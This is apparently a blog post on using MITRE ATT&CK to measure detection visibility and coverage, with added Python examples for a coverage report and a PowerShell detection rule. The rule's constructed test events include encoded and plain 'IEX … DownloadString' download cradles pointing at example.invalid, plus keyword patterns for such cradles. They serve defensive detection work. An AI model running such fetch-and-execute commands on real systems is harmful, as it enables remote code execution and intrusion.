Adversaries have long targeted information across the cyber world, and they are adept at changing the observable characteristics of an attack (hashes, domains, tooling) to evade detection. Security researchers and analysts therefore need to move beyond individual technical indicators or anomalies and define malicious activity in terms of threat behaviors, that is, the tactics and techniques an adversary uses.
MITRE ATT&CK is an open framework and knowledge base of adversary tactics and techniques based on real-world observations, indexed by tactic and broken down into per-technique detail. It is a well-suited foundation for building detection and response programs. Previously, we explained what the MITRE ATT&CK framework is and why it is useful. ATT&CK is a powerful way to enhance, analyze, and test an organization's threat hunting and detection efforts.
Where does ATT&CK fit in the context of your security program?
The NIST Cybersecurity Framework (CSF) is organized around five core functions: Identify, Protect, Detect, Respond, and Recover. ATT&CK can inform all five, but it is most directly applicable to Detect: which techniques can your telemetry identify (for example, through endpoint process monitoring, PowerShell logging, or Active Directory change auditing)? Using ATT&CK to drive detection shortens the time an intrusion goes unnoticed, which is what limits the damage it can do.
Building analytics to detect ATT&CK techniques is different from other approaches to detection. For each technique, ATT&CK lists the data sources that reveal it and gives guidance on how to detect its use from the logs and other security telemetry at your disposal. That technical detail gives companies a basis for building automated monitoring rules or for conducting threat hunts.
How is it useful for metrics/measurements?
Through ATT&CK, security analysts can measure their detection capabilities, particularly in terms of visibility and coverage.
The best approach is to start with the subset of techniques that are visible to the analyst, given the data sources at their disposal. Using visibility as the baseline, a researcher can then determine how many of those visible techniques they can actually detect with their tools and analytics, rather than measuring against the whole matrix and mixing data-collection gaps in with analytic gaps.
The ATT&CK framework has become increasingly important for blue teams, who can use it as a shared vocabulary to collaborate and to track coverage over time.
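A worked example of the visibility-then-coverage calculation described above, added here and not part of the original post. The technique IDs and names are real ATT&CK entries, but the tactic is simplified to one per technique, the data-source mapping is a hand-picked abbreviation of what ATT&CK lists, and the collected sources and analytics inventory are constructed for illustration:

```python
from collections import defaultdict

# Constructed catalog (assumption): a hand-picked subset of ATT&CK techniques.
# IDs and names are real ATT&CK entries; the tactic is simplified to one per
# technique and the data sources are an abbreviated form of what ATT&CK lists.
TECHNIQUES = {
    "T1059.001": ("Execution", "PowerShell",
                  {"Process Creation", "Command Execution", "Script Execution"}),
    "T1003.001": ("Credential Access", "LSASS Memory",
                  {"Process Access", "Process Creation"}),
    "T1098":     ("Persistence", "Account Manipulation",
                  {"Active Directory Object Modification", "User Account Modification"}),
    "T1021.001": ("Lateral Movement", "Remote Desktop Protocol",
                  {"Logon Session Creation", "Network Traffic Flow"}),
    "T1048":     ("Exfiltration", "Exfiltration Over Alternative Protocol",
                  {"Network Traffic Flow", "Network Connection Creation"}),
    "T1562.001": ("Defense Evasion", "Disable or Modify Tools",
                  {"Process Creation", "Command Execution", "Service Metadata"}),
}

# Constructed inventory (assumption): endpoint-only collection, e.g. Sysmon
# forwarded to a SIEM, with no directory, logon or network telemetry.
COLLECTED_SOURCES = {"Process Creation", "Command Execution",
                     "Script Execution", "Process Access"}

# Constructed analytics inventory (assumption): technique IDs that have a rule.
ANALYTICS = {"T1059.001", "T1003.001", "T1021.001"}


def visible_techniques(catalog, collected):
    """Techniques for which at least one required data source is collected."""
    return {tid for tid, (_, _, sources) in catalog.items() if sources & collected}


def detected_techniques(catalog, collected, analytics):
    """Visible techniques that also have an analytic.

    An analytic whose data source is never collected is a paper control: it is
    excluded here and surfaced separately as a blind spot by coverage_report().
    """
    return visible_techniques(catalog, collected) & set(analytics)


def coverage_report(catalog, collected, analytics):
    """Visibility and detection coverage, overall and per tactic."""
    visible = visible_techniques(catalog, collected)
    detected = detected_techniques(catalog, collected, analytics)
    per_tactic = defaultdict(lambda: {"total": 0, "visible": 0, "detected": 0})
    for tid, (tactic, _, _) in catalog.items():
        row = per_tactic[tactic]
        row["total"] += 1
        row["visible"] += tid in visible
        row["detected"] += tid in detected
    total = len(catalog)
    return {
        "overall": {
            "total": total,
            "visible": len(visible),
            "detected": len(detected),
            # Measure detection against what you can see, not the whole matrix;
            # the latter silently mixes data-collection gaps into the number.
            "visibility_pct": round(100 * len(visible) / total, 1),
            "detection_of_visible_pct":
                round(100 * len(detected) / len(visible), 1) if visible else 0.0,
        },
        "by_tactic": dict(per_tactic),
        # Rules that can never fire because their data is not collected.
        "blind_spots": sorted(set(analytics) - visible),
        # Visible techniques with no rule yet: the cheapest next analytics to write.
        "next_analytics": sorted(visible - set(analytics)),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(coverage_report(TECHNIQUES, COLLECTED_SOURCES, ANALYTICS), indent=2))
```

With this inventory three of six techniques are visible (50%), two of the three visible ones have a rule (66.7%), the RDP rule is a blind spot because no logon or network data is collected, and T1562.001 is the obvious next analytic since its data is already there. Re-running the report as collection and rules change is what "tracking coverage over time" means in practice.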
What is the first step to take with respect to ATT&CK?
To find malicious behaviors, you need to be able to see what is happening on your network, and then start creating and using ATT&CK-based analytics. To do so, you first need to understand what data and search capabilities you have. Reviewing the Data Sources listed for each ATT&CK technique against what your environment actually collects is a practical way to build that understanding.
Once you understand your data, you need to collect it into a search platform (for example, a SIEM) so that you can run analytics against it.
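One concrete analytic of the kind the sections above describe, run over constructed process-creation events, as an added example that is not part of the original post. It assumes Sysmon-style fields (image, parent image, command line), which correspond to the ATT&CK data sources for process creation and command execution; the regexes, reason names, severity rule and sample events are my own construction, and the sample events are not real telemetry. The point it adds to the text is that an analytic must decode an -EncodedCommand payload before matching, otherwise base64 alone evades it:

```python
import base64
import re

# Assumption: Sysmon-style process-creation events with image, parent image and
# command line, i.e. the ATT&CK data sources "Process Creation" and
# "Command Execution".

ENCODED_FLAG = re.compile(
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand
    # (-e, -ec, -en, -enc, ...); capture the base64 argument that follows.
    r"(?i)(?:^|\s)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})"
)
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-(?:w|win|windowstyle)\s+hidden")
POLICY_BYPASS = re.compile(r"(?i)(?:^|\s)-(?:ep|ex|exec|executionpolicy)\s+bypass")
DOWNLOAD_CRADLE = re.compile(
    r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
    r"Invoke-Expression|\biex\b|FromBase64String|Net\.WebClient"
)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def decode_encoded_command(token):
    """-EncodedCommand takes base64 of the UTF-16LE script; None if token is not that."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Return an alert dict for suspicious PowerShell use, or None."""
    if _basename(event["image"]) not in POWERSHELL_IMAGES:
        return None
    cmdline = event["cmdline"]
    reasons, decoded = [], None
    m = ENCODED_FLAG.search(cmdline)
    if m:
        reasons.append("encoded_command")
        decoded = decode_encoded_command(m.group(1))
    if HIDDEN_WINDOW.search(cmdline):
        reasons.append("hidden_window")
    if POLICY_BYPASS.search(cmdline):
        reasons.append("exec_policy_bypass")
    # Match the cradle patterns against the decoded payload as well as the raw
    # command line; otherwise -enc alone defeats the check.
    if DOWNLOAD_CRADLE.search(cmdline + " " + (decoded or "")):
        reasons.append("download_cradle")
    if _basename(event["parent"]) in OFFICE_PARENTS:
        reasons.append("office_parent")
    if not reasons:
        return None
    return {
        "host": event["host"],
        "user": event["user"],
        "technique": "T1059.001",  # Command and Scripting Interpreter: PowerShell
        "reasons": reasons,
        "decoded_command": decoded,
        # One weak signal (e.g. -ExecutionPolicy Bypass from a deployment tool) is
        # routine; two or more stacked on one process is worth an analyst's time.
        "severity": "high" if len(reasons) >= 2 else "medium",
    }


def run_detections(events):
    return [a for a in (analyze_event(e) for e in events) if a]


def _ps_encoded(script):
    """Build an -EncodedCommand argument the way an attacker would (sample data only)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events (assumption): not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": r"CORP\alice", "parent": r"C:\Windows\explorer.exe",
     "image": PS, "cmdline": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
    {"host": "ws02", "user": r"CORP\bob",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "image": PS,
     "cmdline": "powershell.exe -nop -w hidden -enc " + _ps_encoded(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1.ps1')")},
    {"host": "ws02", "user": r"CORP\bob", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami /all"},
    {"host": "srv01", "user": r"CORP\svc_web", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": PS, "cmdline": "powershell -ep bypass -c \"IEX (New-Object Net.WebClient)"
                             ".DownloadString('http://example.invalid/a.ps1')\""},
    {"host": "ws03", "user": "NT AUTHORITY\\SYSTEM", "parent": r"C:\Windows\CCM\CcmExec.exe",
     "image": PS, "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\deploy.ps1"},
]

if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert["severity"], alert["host"], alert["reasons"])
```

Run against the five sample events, the rule fires on the Word-spawned encoded command (four stacked reasons, high), the web-server-spawned cradle (high), and the deployment-tool script (a single policy-bypass reason, medium), and stays quiet on the benign inventory script and on whoami. The same logic translates directly into a SIEM query; the regexes and the decoded-payload check are the parts to carry over.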
MITRE ATT&CK is kept up to date
Adversaries constantly refine their techniques to avoid detection, so their behavior becomes harder to spot and traditional, indicator-based detection methods may no longer be sufficient. One advantage of ATT&CK is that MITRE and the contributing community keep it updated as the threat landscape changes, so detection programs built on it have a current reference to measure against.
MITRE ATT&CK is a powerful way to classify, study, and understand adversary techniques, and it can improve cybersecurity efforts in many different ways. Hopefully, this post has helped you see how to use ATT&CK to enhance, analyze, and test your threat detection efforts.